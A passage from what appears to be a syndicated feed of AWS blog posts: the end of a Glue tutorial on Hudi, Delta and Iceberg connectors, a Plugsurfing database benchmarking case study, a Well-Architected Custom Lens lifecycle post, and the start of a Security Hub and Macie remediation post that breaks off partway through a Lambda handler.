  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Apache Iceberg 0.12.0

Complete the following steps to create a custom connection for Apache Iceberg 0.12.0:

  1. Download the following JAR files, and upload them to your S3 bucket.
    1. https://search.maven.org/remotecontent?filepath=org/apache/iceberg/iceberg-spark3-runtime/0.12.0/iceberg-spark3-runtime-0.12.0.jar
    2. https://repo1.maven.org/maven2/software/amazon/awssdk/bundle/2.15.40/bundle-2.15.40.jar
    3. https://repo1.maven.org/maven2/software/amazon/awssdk/url-connection-client/2.15.40/url-connection-client-2.15.40.jar
  2. Open AWS Glue Studio.
  3. Choose Connectors.
  4. Choose Create custom connector.
  5. For Connector S3 URL, enter the comma-separated Amazon S3 paths for the above JAR files.
  6. For Name, enter iceberg-0120-byoc-connector.
  7. For Connector Type, choose Spark.
  8. For Class name, enter iceberg.
  9. Choose Create connector.
  10. Choose iceberg-0120-byoc-connector.
  11. Choose Create connection.
  12. For Name, enter iceberg-0120-byoc-connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Apache Iceberg 0.13.1

Complete the following steps to create a custom connection for Apache Iceberg 0.13.1:

  1. Download the following JAR files, and upload them to your S3 bucket.
    1. iceberg-spark-runtime-3.1_2.12-0.13.1.jar
    2. https://repo1.maven.org/maven2/software/amazon/awssdk/bundle/2.17.161/bundle-2.17.161.jar
    3. https://repo1.maven.org/maven2/software/amazon/awssdk/url-connection-client/2.17.161/url-connection-client-2.17.161.jar
  2. Open AWS Glue Studio.
  3. Choose Connectors.
  4. Choose Create custom connector.
  5. For Connector S3 URL, enter the comma-separated Amazon S3 paths for the above JAR files.
  6. For Name, enter iceberg-0131-byoc-connector.
  7. For Connector Type, choose Spark.
  8. For Class name, enter iceberg.
  9. Choose Create connector.
  10. Choose iceberg-0131-byoc-connector.
  11. Choose Create connection.
  12. For Name, enter iceberg-0131-byoc-connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Prerequisites

To continue this tutorial, you must create the following AWS resources in advance:

  • AWS Identity and Access Management (IAM) role for your ETL job or notebook as instructed in Set up IAM permissions for AWS Glue Studio. Note that AmazonEC2ContainerRegistryReadOnly or equivalent permissions are needed when you use the marketplace connectors.
  • An Amazon S3 bucket for storing data.
  • A Glue connection (either the marketplace connector or the custom connector corresponding to your data lake format).

Reads/writes using the connector on AWS Glue Studio Notebook

The following are the instructions to read and write tables using each data lake format on an AWS Glue Studio notebook. As a prerequisite, make sure that you have created a connector and a connection for that connector using the information above.
The example notebooks are hosted in the AWS Glue Samples GitHub repository, where seven notebooks are available. In the following instructions, we use one notebook per data lake format.

Apache Hudi

To read/write Apache Hudi tables in the AWS Glue Studio notebook, complete the following:

  1. Download hudi_dataframe.ipynb.
  2. Open AWS Glue Studio.
  3. Choose Jobs.
  4. Choose Jupyter notebook and then choose Upload and edit an existing notebook. From Choose file, select your ipynb file and choose Open, then choose Create.
  5. On the Notebook setup page, for Job name, enter your job name.
  6. For IAM role, select your IAM role. Choose Create job. After a short time period, the Jupyter notebook editor appears.
  7. In the first cell, replace the placeholder with your Hudi connection name, and run the cell:
    %connections hudi-0101-byoc-connection (Alternatively you can use your connection name created from the marketplace connector).
  8. In the second cell, replace the S3 bucket name placeholder with your S3 bucket name, and run the cell.
  9. Run the cells in the section Initialize SparkSession.
  10. Run the cells in the section Clean up existing resources.
  11. Run the cells in the section Create Hudi table with sample data using catalog sync to create a new Hudi table with sample data.
  12. Run the cells in the section Read from Hudi table to verify the new Hudi table. There are five records in this table.
  13. Run the cells in the section Upsert records into Hudi table to see how upsert works on Hudi. This code inserts one new record and updates one existing record. You can verify that there is a new record product_id=00006, and that the existing record product_id=00001’s price has been updated from 250 to 400.
  14. Run the cells in the section Delete a Record. You can verify that the existing record product_id=00001 has been deleted.
  15. Run the cells in the section Point in time query. You can verify that you’re seeing the previous version of the table where the upsert and delete operations haven’t been applied yet.
  16. Run the cells in the section Incremental Query. You can verify that you’re seeing only the recent commit about product_id=00006.

With this notebook, you completed the basic Spark DataFrame operations on Hudi tables.
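
For reference, here is a minimal PySpark sketch of the kind of upsert and read the notebook performs, assuming the SparkSession (spark) has already been initialized as in the notebook. The table name, fields, sample values, and S3 path are placeholder assumptions rather than the exact contents of hudi_dataframe.ipynb.

# Hudi write options; the table name and key fields are placeholders
hudi_options = {
    "hoodie.table.name": "product_table",
    "hoodie.datasource.write.recordkey.field": "product_id",
    "hoodie.datasource.write.precombine.field": "updated_at",
    "hoodie.datasource.write.operation": "upsert",
}

# One record to upsert (placeholder values)
updates = spark.createDataFrame(
    [("00001", "product 1", 400, "2022-07-14 00:00:00")],
    ["product_id", "product_name", "price", "updated_at"],
)

# Upsert into the Hudi table stored on S3
(updates.write.format("hudi")
    .options(**hudi_options)
    .mode("append")
    .save("s3://my-example-bucket/hudi/product_table/"))

# Read the table back to verify the change
(spark.read.format("hudi")
    .load("s3://my-example-bucket/hudi/product_table/")
    .filter("product_id = '00001'")
    .show())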

Delta Lake

To read/write Delta Lake tables in the AWS Glue Studio notebook, complete the following steps:

  1. Download delta_sql.ipynb.
  2. Open AWS Glue Studio.
  3. Choose Jobs.
  4. Choose Jupyter notebook, and then choose Upload and edit an existing notebook. From Choose file, select your ipynb file and choose Open, then choose Create.
  5. On the Notebook setup page, for Job name, enter your job name.
  6. For IAM role, select your IAM role. Choose Create job. After a short time period, the Jupyter notebook editor appears.
  7. In the first cell, replace the placeholder with your Delta connection name, and run the cell:
    %connections delta-100-byoc-connection
  8. In the second cell, replace the S3 bucket name placeholder with your S3 bucket name, and run the cell.
  9. Run the cells in the section Initialize SparkSession.
  10. Run the cells in the section Clean up existing resources.
  11. Run the cells in the section Create Delta table with sample data to create a new Delta table with sample data.
  12. Run the cells in the section Create a Delta Lake table.
  13. Run the cells in the section Read from Delta Lake table to verify the new Delta table. There are five records in this table.
  14. Run the cells in the section Insert records. The query inserts two new records: record_id=00006, and record_id=00007.
  15. Run the cells in the section Update records. The query updates the price of the existing records record_id=00006 and record_id=00007 from 500 to 300.
  16. Run the cells in the section Upsert records to see how upsert works on Delta. This code inserts one new record and updates one existing record. You can verify that there is a new record product_id=00008, and that the existing record product_id=00001’s price has been updated from 250 to 400.
  17. Run the cells in the section Alter DeltaLake table. The queries add one new column, and update the values in the column.
  18. Run the cells in the section Delete records. You can verify that the record product_id=00006 has been deleted because its product_name is Pen.
  19. Run the cells in the section View History to describe the history of operations that was triggered against the target Delta table.

With this notebook, you completed the basic Spark SQL operations on Delta tables.
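
As a rough sketch of the Spark SQL style the notebook uses, the statements below create, modify, and inspect a Delta table, assuming the SparkSession has been initialized with the Delta Lake extensions as in the Initialize SparkSession section. The table name, S3 location, and sample values are placeholder assumptions.

# Create a Delta table at a placeholder S3 location
spark.sql("""
    CREATE TABLE IF NOT EXISTS delta_products (
        product_id STRING, product_name STRING, price INT
    )
    USING delta
    LOCATION 's3://my-example-bucket/delta/delta_products/'
""")

# Insert sample records, then update one of them (placeholder values)
spark.sql("INSERT INTO delta_products VALUES ('00006', 'Pen', 500), ('00007', 'Mug', 500)")
spark.sql("UPDATE delta_products SET price = 300 WHERE product_id = '00007'")

# DESCRIBE HISTORY lists the operations applied to the table, as in the View History section
spark.sql("DESCRIBE HISTORY delta_products").show(truncate=False)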

Apache Iceberg

To read/write Apache Iceberg tables in the AWS Glue Studio notebook, complete the following:

  1. Download iceberg_sql.ipynb.
  2. Open AWS Glue Studio.
  3. Choose Jobs.
  4. Choose Jupyter notebook and then choose Upload and edit an existing notebook. From Choose file, select your ipynb file and choose Open, then choose Create.
  5. On the Notebook setup page, for Job name, enter your job name.
  6. For IAM role, select your IAM role. Choose Create job. After a short time period, the Jupyter notebook editor appears.
  7. In the first cell, replace the placeholder with your Iceberg connection name, and run the cell:
    %connections iceberg-0131-byoc-connection (Alternatively you can use your connection name created from the marketplace connector).
  8. In the second cell, replace the S3 bucket name placeholder with your S3 bucket name, and run the cell.
  9. Run the cells in the section Initialize SparkSession.
  10. Run the cells in the section Clean up existing resources.
  11. Run the cells in the section Create Iceberg table with sample data to create a new Iceberg table with sample data.
  12. Run the cells in the section Read from Iceberg table.
  13. Run the cells in the section Upsert records into Iceberg table.
  14. Run the cells in the section Delete records.
  15. Run the cells in the section View History and Snapshots.

With this notebook, you completed the basic Spark SQL operations on Iceberg tables.
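
For illustration, here is a minimal sketch of the Spark SQL pattern for Iceberg tables, assuming the SparkSession was initialized with an Iceberg catalog (called glue_catalog here) as in the Initialize SparkSession section. The catalog, database, table, and values are placeholder assumptions.

# Create an Iceberg table in a placeholder catalog and database
spark.sql("""
    CREATE TABLE IF NOT EXISTS glue_catalog.iceberg_db.products (
        product_id STRING, product_name STRING, price INT
    )
    USING iceberg
""")

spark.sql("INSERT INTO glue_catalog.iceberg_db.products VALUES ('00001', 'product 1', 250)")

# Iceberg exposes table metadata as queryable tables, as used in View History and Snapshots
spark.sql("SELECT * FROM glue_catalog.iceberg_db.products.history").show()
spark.sql("SELECT * FROM glue_catalog.iceberg_db.products.snapshots").show()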

Conclusion

This post summarized how to use Apache Hudi, Delta Lake, and Apache Iceberg on the AWS Glue platform, and demonstrated how each format works with an AWS Glue Studio notebook. You can start using these data lake formats easily with Spark DataFrames and Spark SQL in Glue jobs or Glue Studio notebooks.

This post focused on interactive coding and querying on notebooks. The upcoming part 2 will focus on the experience using AWS Glue Studio Visual Editor and Glue DynamicFrames for customers who prefer visual authoring without the need to write code.


About the Authors

Noritaka Sekiyama is a Principal Big Data Architect on the AWS Glue team. He enjoys learning different use cases from customers and sharing knowledge about big data technologies with the wider community.

Dylan Qu is a Specialist Solutions Architect focused on Big Data & Analytics with AWS. He helps customers architect and build highly scalable, performant, and secure cloud-based solutions on AWS.

Monjumi Sarma is a Data Lab Solutions Architect at AWS. She helps customers architect data analytics solutions, which gives them an accelerated path towards modernization initiatives.

How Plugsurfing doubled performance and reduced cost by 70% with purpose-built databases and AWS Graviton

Post Syndicated from Anand Shah original https://aws.amazon.com/blogs/big-data/how-plugsurfing-doubled-performance-and-reduced-cost-by-70-with-purpose-built-databases-and-aws-graviton/

Plugsurfing aligns the entire car charging ecosystem—drivers, charging point operators, and carmakers—within a single platform. The over 1 million drivers connected to the Plugsurfing Power Platform benefit from a network of over 300,000 charging points across Europe. Plugsurfing serves charging point operators with a backend cloud software for managing everything from country-specific regulations to providing diverse payment options for customers. Carmakers benefit from white label solutions as well as deeper integrations with their in-house technology. The platform-based ecosystem has already processed more than 18 million charging sessions. Plugsurfing was acquired fully by Fortum Oyj in 2018.

Plugsurfing uses Amazon OpenSearch Service as a central data store to store information on 300,000 charging stations and to power search and filter requests coming from mobile, web, and connected car dashboard clients. With increasing usage, Plugsurfing created multiple read replicas of an OpenSearch Service cluster to meet demand and scale. Over time and with the increase in demand, this solution became cost prohibitive and limited in terms of cost-performance benefit.

AWS EMEA Prototyping Labs collaborated with the Plugsurfing team for 4 weeks on a hands-on prototyping engagement to solve this problem, which resulted in 70% cost savings and doubled the performance benefit over the current solution. This post shows the overall approach and ideas we tested with Plugsurfing to achieve the results.

The challenge: Scaling higher transactions per second while keeping costs under control

One of the key issues of the legacy solution was keeping up with higher transactions per second (TPS) from APIs while keeping costs low. The majority of the cost was coming from the OpenSearch Service cluster, because the mobile, web, and EV car dashboards use different APIs for different use cases, but all query the same cluster. The solution to achieve higher TPS with the legacy solution was to scale the OpenSearch Service cluster.

The following figure illustrates the legacy architecture.

Legacy Architecture

Plugsurfing APIs are responsible for serving data for four different use cases:

  • Radius search – Find all the EV charging stations (latitude/longitude) within an x km radius of the point of interest (or the current GPS location).
  • Square search – Find all the EV charging stations within a box of length x width, where the point of interest (or the current GPS location) is at the center.
  • Geo clustering search – Find all the EV charging stations clustered (grouped) by their concentration within a given area. For example, searching all EV chargers in all of Germany results in something like 50 in Munich and 100 in Berlin.
  • Radius search with filtering – Filter the results to EV chargers that are available or in use, by plug type, power rating, or other filters.

The OpenSearch Service domain configuration was as follows:

  • m4.10xlarge.search x 4 nodes
  • Elasticsearch 7.10 version
  • A single index to store 300,000 EV charger locations with five shards and one replica
  • A nested document structure

The following code shows an example document:

{
   "locationId":"location:1",
   "location":{
      "latitude":32.1123,
      "longitude":-9.2523
   },
   "adress":"parking lot 1",
   "chargers":[
      {
         "chargerId":"location:1:charger:1",
         "connectors":[
            {
               "connectorId":"location:1:charger:1:connector:1",
               "status":"AVAILABLE",
               "plug_type":"Type A"
            }
         ]
      }
   ]
}

Solution overview

AWS EMEA Prototyping Labs proposed an experimentation approach to try three high-level ideas for performance optimization and to lower overall solution costs.

We launched an Amazon Elastic Compute Cloud (Amazon EC2) instance in a prototyping AWS account to host a benchmarking tool based on k6 (an open-source tool that makes load testing simple for developers and QA engineers). Later, we used scripts to dump and restore production data to various databases, transforming it to fit different data models. Then we ran the k6 scripts to run and record performance metrics for each use case, database, and data model combination. We also used the AWS Pricing Calculator to estimate the cost of each experiment.

Experiment 1: Use AWS Graviton and optimize OpenSearch Service domain configuration

We benchmarked a replica of the legacy OpenSearch Service domain setup in a prototyping environment to baseline performance and costs. Next, we analyzed the current cluster setup and recommended testing the following changes:

  • Use AWS Graviton based, memory-optimized EC2 instances (r6g), with two nodes in the cluster
  • Reduce the number of shards from five to one, given that the volume of data (all documents) is less than 1 GB
  • Increase the refresh interval configuration from the default 1 second to 5 seconds (see the sketch after this list)
  • Denormalize the full document; if that’s not possible, denormalize all the fields that are part of the search query
  • Upgrade to Amazon OpenSearch Service 1.0 from Elasticsearch 7.10
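
The shard and refresh interval changes can be applied through the OpenSearch REST API; the sketch below illustrates this, with the domain endpoint and index name as placeholder assumptions and authentication (for example, SigV4 request signing) omitted for brevity.

import requests

endpoint = "https://my-opensearch-domain.example.com"  # placeholder domain endpoint

# Create the index with a single primary shard (the shard count is fixed at index creation)
requests.put(
    f"{endpoint}/ev-chargers",
    json={"settings": {"index": {"number_of_shards": 1, "number_of_replicas": 1}}},
)

# Raise the refresh interval from the default 1 second to 5 seconds (a dynamic setting)
requests.put(
    f"{endpoint}/ev-chargers/_settings",
    json={"index": {"refresh_interval": "5s"}},
)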

Plugsurfing created multiple new OpenSearch Service domains with the same data and benchmarked them against the legacy baseline to obtain the following results. The first row represents the baseline from the legacy setup; the last row represents the best outcome across all experiments performed for these use cases.

DB Engine | Version | Node Type | Nodes in Cluster | Configurations | Data Modeling | Radius req/sec | Filtering req/sec | Performance Gain %
--- | --- | --- | --- | --- | --- | --- | --- | ---
Elasticsearch | 7.1 | m4.10xlarge | 4 | 5 shards, 1 replica | Nested | 2841 | 580 | 0
Amazon OpenSearch Service | 1.0 | r6g.xlarge | 2 | 1 shard, 1 replica | Nested | 850 | 271 | 32.77
Amazon OpenSearch Service | 1.0 | r6g.xlarge | 2 | 1 shard, 1 replica | Denormalized | 872 | 670 | 45.07
Amazon OpenSearch Service | 1.0 | r6g.2xlarge | 2 | 1 shard, 1 replica | Nested | 1667 | 474 | 62.58
Amazon OpenSearch Service | 1.0 | r6g.2xlarge | 2 | 1 shard, 1 replica | Denormalized | 1993 | 1268 | 95.32

With this experiment, Plugsurfing gained 95% better performance (nearly double) across the radius and filtering use cases.

Experiment 2: Use purpose-built databases on AWS for different use cases

We tested Amazon OpenSearch Service, Amazon Aurora PostgreSQL-Compatible Edition, and Amazon DynamoDB extensively with many data models for different use cases.

We tested the square search use case with an Aurora PostgreSQL cluster with a db.r6g.2xlarge single node as the reader and a db.r6g.large single node as the writer. The square search used a single PostgreSQL table configured via the following steps:

  1. Create the geo search table with geography as the data type to store latitude/longitude:

CREATE TYPE status AS ENUM ('available', 'inuse', 'out-of-order');

CREATE TABLE IF NOT EXISTS square_search
(
id     serial PRIMARY KEY,
geog   geography(POINT),
status status,
data   text -- Can be used as json data type, or add extra fields as flat json
);

  2. Create an index on the geog field:

CREATE INDEX global_points_gix ON square_search USING GIST (geog);

  3. Query the data for the square search use case:

SELECT id, ST_AsText(geog), status, data
FROM square_search
WHERE geog && ST_MakeEnvelope(32.5, 9, 32.8, 11, 4326)
LIMIT 100;

We achieved an eight-times improvement in TPS for the square search use case, as shown in the following table.

DB Engine | Version | Node Type | Nodes in Cluster | Configurations | Data modeling | Square req/sec | Performance Gain %
--- | --- | --- | --- | --- | --- | --- | ---
Elasticsearch | 7.1 | m4.10xlarge | 4 | 5 shards, 1 replica | Nested | 412 | 0
Aurora PostgreSQL | 13.4 | r6g.large | 2 | PostGIS, Denormalized | Single table | 881 | 213.83
Aurora PostgreSQL | 13.4 | r6g.xlarge | 2 | PostGIS, Denormalized | Single table | 1770 | 429.61
Aurora PostgreSQL | 13.4 | r6g.2xlarge | 2 | PostGIS, Denormalized | Single table | 3553 | 862.38

We tested the geo clustering search use case with a DynamoDB model. The partition key (PK) is made up of three components, <zoom-level>:<geo-hash>:<api-key>, and the sort key is the EV charger's current status. The three components are:

  • The zoom level of the map set by the user
  • The geo hash computed based on the map tile in the user’s view port area (at every zoom level, the map of Earth is divided into multiple tiles, where each tile can be represented as a geohash)
  • The API key to identify the API user
Partition Key (String) | Sort Key (String) | total_pins (Number) | filter1_pins (Number) | filter2_pins (Number) | filter3_pins (Number)
--- | --- | --- | --- | --- | ---
5:gbsuv:api_user_1 | Available | 100 | 50 | 67 | 12
5:gbsuv:api_user_1 | in-use | 25 | 12 | 6 | 1
6:gbsuvt:api_user_1 | Available | 35 | 22 | 8 | 0
6:gbsuvt:api_user_1 | in-use | 88 | 4 | 0 | 35

The writer updates the counters (incrementing or decrementing them) for each filter condition and charger status whenever an EV charger's status is updated, at all zoom levels. With this model, the reader can query pre-clustered data with a single direct partition hit for all the map tiles viewable by the user at the given zoom level.
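
A minimal reader-side sketch of this lookup follows, assuming attribute names PK and SK for the partition and sort keys and a hypothetical table name; these names are illustrative and do not come from the Plugsurfing implementation.

import boto3
from boto3.dynamodb.conditions import Key

table = boto3.resource("dynamodb").Table("ev-charger-clusters")  # placeholder table name

# One partition holds the pre-clustered counters for a zoom level, geohash tile, and API user
response = table.query(KeyConditionExpression=Key("PK").eq("5:gbsuv:api_user_1"))

for item in response["Items"]:
    # The sort key is the charger status; counters come back pre-aggregated per filter
    print(item["SK"], item["total_pins"], item["filter1_pins"])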

The DynamoDB model helped us gain 45-times better read performance for our geo clustering use case. However, it also added extra work on the writer side to pre-compute the numbers and update multiple rows when the status of a single EV charger is updated. The following table summarizes our results.

DB Engine | Version | Node Type | Nodes in Cluster | Configurations | Data modeling | Clustering req/sec | Performance Gain %
--- | --- | --- | --- | --- | --- | --- | ---
Elasticsearch | 7.1 | m4.10xlarge | 4 | 5 shards, 1 replica | Nested | 22 | 0
DynamoDB | NA | Serverless | 0 | 100 WCU, 500 RCU | Single table | 1000 | 4545.45

Experiment 3: Use AWS Lambda@Edge and AWS Wavelength for better network performance

We recommended that Plugsurfing use Lambda@Edge and AWS Wavelength to optimize network performance by shifting some of the APIs to the edge, closer to the user. The EV car dashboard can use its 5G network connectivity to invoke Plugsurfing APIs with AWS Wavelength.

Post-prototype architecture

The post-prototype architecture used purpose-built databases on AWS to achieve better performance across all four use cases. We looked at the results and split the workload based on which database performs best for each use case. This approach optimized performance and cost, but added complexity for readers and writers. The final experiment summary below shows the database that provides the best performance for each use case.

Plugsurfing has already implemented a short-term plan as an immediate action after the prototype, and plans to implement the mid-term and long-term actions in the future.

DB Engine | Node Type | Configurations | Radius req/sec | Radius Filtering req/sec | Clustering req/sec | Square req/sec | Monthly Costs ($) | Cost Benefit % | Performance Gain %
--- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Elasticsearch 7.1 | m4.10xlarge x4 | 5 shards | 2841 | 580 | 22 | 412 | 9584.64 | 0 | 0
Amazon OpenSearch Service 1.0 | r6g.2xlarge x2 | 1 shard, Nested | 1667 | 474 | 34 | 142 | 1078.56 | 88.75 | -39.9
Amazon OpenSearch Service 1.0 | r6g.2xlarge x2 | 1 shard | 1993 | 1268 | 125 | 685 | 1078.56 | 88.75 | 5.6
Aurora PostgreSQL 13.4 | r6g.2xlarge x2 | PostGIS | 0 | 0 | 275 | 3553 | 1031.04 | 89.24 | 782.03
DynamoDB | Serverless | 100 WCU, 500 RCU | 0 | 0 | 1000 | 0 | 106.06 | 98.89 | 4445.45
Summary | | | 2052 | 1268 | 1000 | 3553 | 2215.66 | 76.88 | 104.23

The following diagram illustrates the updated architecture.

Post Prototype Architecture

Conclusion

Plugsurfing was able to achieve a 70% cost reduction over their legacy setup with two-times better performance by using purpose-built databases like DynamoDB, Aurora PostgreSQL, and AWS Graviton based instances for Amazon OpenSearch Service. They achieved the following results:

  • The radius search and radius search with filtering use cases achieved better performance using Amazon OpenSearch Service on AWS Graviton with a denormalized document structure
  • The square search use case performed better using Aurora PostgreSQL, where we used the PostGIS extension for geo square queries
  • The geo clustering search use case performed better using DynamoDB

Learn more about AWS Graviton instances and purpose-built databases on AWS, and let us know how we can help optimize your workload on AWS.


About the Author

Anand Shah is a Big Data Prototyping Solution Architect at AWS. He works with AWS customers and their engineering teams to build prototypes using AWS Analytics services and purpose-built databases. Anand helps customers solve the most challenging problems using art-of-the-possible technology. He enjoys beaches in his leisure time.

Implementing the AWS Well-Architected Custom Lens lifecycle in your organization

Post Syndicated from Robert Hoffman original https://aws.amazon.com/blogs/architecture/implementing-the-aws-well-architected-custom-lens-lifecycle-in-your-organization/

In this blog post, we present a lifecycle that helps you build, validate, and improve your own AWS Well-Architected Custom Lens, in order to roll it out across your whole organization. The AWS Well-Architected Custom Lens is a new feature of the AWS Well-Architected Tool that lets you bring your own best practices to complement the existing Well-Architected Framework.

The Custom Lens lifecycle: how a Custom Lens can benefit your organization

Figure 1. The AWS Well-Architected Custom Lens lifecycle

Each organization has its own requirements, processes, best practices, and tools, but the information can be spread over many systems and knowledge bases. A Custom Lens can capture the specifics of a working environment and let coworkers access this information in a single place—from the AWS console—without the need to go to a separate tool. A Custom Lens can be created in a central management account and securely shared with other accounts.

A Custom Lens can be updated periodically as either a major or minor version. If it is a minor version, the change is automatically applied to all accounts that the lens has been shared with. If it is a major version, a summary of the changes is displayed and the user has to accept the updated Custom Lens. Accepting the changes applies the update to existing workload reviews and prompts the user to review the workload. Thus, updating a Custom Lens is an effective mechanism to continuously inform teams about new best practices.

In addition, maintaining and improving a Custom Lens continuously helps to identify gaps in organization-wide tooling, guidance, or documentation. You can aggregate feedback and metrics from reviews that have been performed and use it to drive the improvement process of the content. More importantly, the gathered metrics help measure the overall adherence to best practices and requirements in your organization. If you focus on creating clear, concise, and actionable content for your Custom Lens, the time needed to identify and implement improvements is reduced. As teams realize the value of the Custom Lens, more reviews will be performed, and you will receive more data to construct a comprehensive view.

1. Plan

The Plan phase identifies the benefits that a Custom Lens can provide your organization by identifying current gaps. You also define the scope of your Custom Lens, which is the type of content that supports your desired business outcomes. Depending on the scope, you need to identify the appropriate stakeholders and gain support for the initiative.

2. Implement

In the Implement phase, content is created for the Custom Lens with a working group. While doing this, you can identify missing supplementary artefacts, like documentation or tooling. If that is the case, you can create these artefacts and link to them from the Custom Lens Improvement Plan.

As part of the implementation, the Custom Lens is created by uploading a JSON file in the appropriate format to a central management account, and then sharing the lens with the organization’s AWS accounts. You can share the Custom Lens with IAM principals, such as users, roles, and AWS accounts. For broader and more efficient sharing, you now have the ability to scale by sharing your Custom Lens with individual organizational units or your entire AWS organization. This feature reduces management overhead and removes the need for custom automation.

3. Measure

The Measure phase aggregates feedback and metrics from reviews that have been performed with your Custom Lens; this information is used to drive the improvement process.

The Well-Architected Tool offers a way to share workload reviews, and you can use this to share all reviews with a central AWS account. You can then extract and analyze the review data in the central account, for example by building a dashboard. The Well-Architected Lab for building custom reports provides a solution that you can implement.

4. Improve

In the Improve phase, the gathered metrics and feedback are used to identify areas for future improvement. For example, you might find common gaps among the performed workload reviews, where the same best practices are not fulfilled. When you investigate the root cause, you can learn that the existing content lacks clarity or that the suggested tools are difficult to use.

In addition, improvements, such as content gaps that were not addressed during the first iteration of the Custom Lens, can be added to the backlog before you repeat the cycle.

To roll out changes of your Custom Lens in an automated and repeatable fashion, you can implement the architecture depicted in Figure 2.

Figure 2. Combining AWS CodeCommit with AWS Lambda to update your Custom Lens whenever a file change is pushed to the code repository

This architecture enables automated releases of new versions of your Custom Lens whenever you commit an updated JSON file to the code repository. In detail, the steps are:

  1. The JSON file of your Custom Lens is stored in an AWS CodeCommit repository. An author pushes an updated version of the file to the repository.
  2. The CodeCommit repository is configured with a trigger action that invokes an AWS Lambda function on each commit.
  3. The Lambda function downloads the updated file by using the GetFile API of CodeCommit. Then, the Lambda function imports the updated Custom Lens and publishes it as a new version by using the ImportLens and CreateLensVersion APIs of the AWS Well-Architected Tool, and shares the Custom Lens using CreateLensShare (a sketch of this function follows the list).
  4. The updated Custom Lens is available in all accounts that the lens has been shared with.
  5. Reviewers can create new workload reviews with the Custom Lens or upgrade to the newest version for existing workload reviews.
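
The following is a minimal sketch of such a Lambda function using boto3. The repository name, file path, lens alias, version string, and target account ID are placeholder assumptions, and error handling is omitted.

import json
import uuid
import boto3

codecommit = boto3.client("codecommit")
wellarchitected = boto3.client("wellarchitected")

REPO_NAME = "custom-lens-repo"   # placeholder repository name
FILE_PATH = "custom-lens.json"   # placeholder file path
LENS_ALIAS = "my-custom-lens"    # placeholder; use your Custom Lens ARN when updating an existing lens


def handler(event, context):
    # 1. Fetch the updated JSON definition that was pushed to CodeCommit
    lens_json = codecommit.get_file(
        repositoryName=REPO_NAME, filePath=FILE_PATH
    )["fileContent"].decode("utf-8")

    # 2. Import the definition as a new draft of the Custom Lens
    wellarchitected.import_lens(
        LensAlias=LENS_ALIAS,
        JSONString=lens_json,
        ClientRequestToken=str(uuid.uuid4()),
    )

    # 3. Publish the draft as a new lens version (placeholder version string)
    wellarchitected.create_lens_version(
        LensAlias=LENS_ALIAS,
        LensVersion="1.1",
        IsMajorVersion=False,
        ClientRequestToken=str(uuid.uuid4()),
    )

    # 4. Share the Custom Lens with another account (or an OU / the organization)
    wellarchitected.create_lens_share(
        LensAlias=LENS_ALIAS,
        SharedWith="111122223333",
        ClientRequestToken=str(uuid.uuid4()),
    )

    return {"statusCode": 200, "body": json.dumps("Custom Lens updated")}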

Conclusion

In this blog post, we walked you through the Custom Lens lifecycle, a process to create and continuously improve a Custom Lens for your organization. If you have a special software development lifecycle, a customized security and compliance framework, or other highly specific requirements or best practices that you want disseminated and measurable, learn more about how to create a Custom Lens in the Well-Architected Tool.

AWS Well-Architected is a set of guiding design principles developed by AWS to help organizations build secure, high-performing, resilient, and efficient infrastructure for a variety of applications and workloads. Use the AWS Well-Architected Tool to review your workloads periodically to address important design considerations and ensure that they follow the best practices and guidance of the AWS Well-Architected Framework. For follow up questions or comments, join our growing community on AWS re:Post.

Use Security Hub custom actions to remediate S3 resources based on Macie discovery results

Post Syndicated from Jonathan Nguyen original https://aws.amazon.com/blogs/security/use-security-hub-custom-actions-to-remediate-s3-resources-based-on-macie-discovery-results/

The amount of data available to be collected, stored, and processed within an organization’s AWS environment can grow rapidly and exponentially. This increases operational complexity and the need to identify and protect sensitive data. If your security teams must review and remediate security risks manually, they either need a large team or the actions might not be timely. With manual operation, there is also the chance that a step is missed or the incorrect action is taken. As a result, your security teams need an automated and scalable way to support these operations efficiently.

Amazon Macie is a fully managed data security and data privacy service that uses machine learning and pattern matching to discover and protect your sensitive data in AWS. Macie generates findings for sensitive data in an S3 object or a potential issue with the security or privacy of an S3 bucket. AWS Security Hub allows you to gain a centralized view into the security posture across your AWS environment by aggregating security findings from various AWS services and partner products, including Amazon Macie. Security Hub also includes the custom actions feature, which you can use to create actions for response and remediation to selected findings within the Security Hub console in an efficient and consistent manner.

It is important for your security teams to create effective and standardized mechanisms for taking action against Macie findings to ensure that data remains secure. By using Security Hub custom actions, you can have predefined actions for the security team to take against Macie findings without having to manually find and remediate the resources.

This blog post provides you with an example solution for responding to Macie sensitive data findings and policy findings in Security Hub by using custom actions. I will walk through the components of the solution, as well as opportunities where resources can be customized for your specific use case.

Prerequisites

You must have AWS Security Hub and Amazon Macie enabled in the AWS account where you are deploying this solution.

Solution overview

In this solution, you’ll use a combination of Security Hub custom actions, Amazon EventBridge, and AWS Lambda to take action on Macie findings in Security Hub. You will be working with the findings within the same AWS account where you deployed the solution.

Macie generates two categories of findings relating to different resources, which will require different remediation actions.

  1. A policy finding is a detailed report of a potential policy violation or issue with the security or privacy of an Amazon Simple Storage Service (Amazon S3) bucket.
  2. A sensitive data finding is a detailed report of sensitive data in an S3 object.

A full list of Macie finding types can be found in the Amazon Macie User Guide.

For the two Macie finding categories, there is an associated Security Hub custom action:

  1. Custom action for sensitive data finding (S3 object) – When the security team selects this custom action, the action invokes a Lambda function that will take the following steps on the S3 object in the Macie finding (see the sketch after this list):
    1. Tag the object with the Security Hub finding ID
    2. Encrypt the S3 object with a different customer-managed KMS key
    3. Update the Security Hub finding workflow status to RESOLVED
  2. Custom action for policy finding (S3 bucket) – When you select this custom action, it invokes a Lambda function that will take the following steps on the S3 bucket in the Macie finding:
    1. Tag the bucket with the Security Hub finding ID
    2. Update the S3 bucket configuration to:
      • Enable default encryption
      • Enable public access block
    3. Update the Security Hub finding workflow status to RESOLVED
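As a rough illustration, a handler for the sensitive data (S3 object) action could look like the following sketch. The tag key, the KMS key environment variable, and the way the finding is parsed are assumptions for this example, not the exact implementation in the solution.

    import os

    import boto3

    s3 = boto3.client("s3")
    securityhub = boto3.client("securityhub")


    def handler(event, context):
        # Security Hub custom actions deliver the selected findings in event["detail"]["findings"]
        for finding in event["detail"]["findings"]:
            finding_id = finding["Id"]
            product_arn = finding["ProductArn"]
            # Assumes the first resource in the finding is the S3 object reported by Macie
            object_arn = finding["Resources"][0]["Id"]  # arn:aws:s3:::bucket-name/object-key
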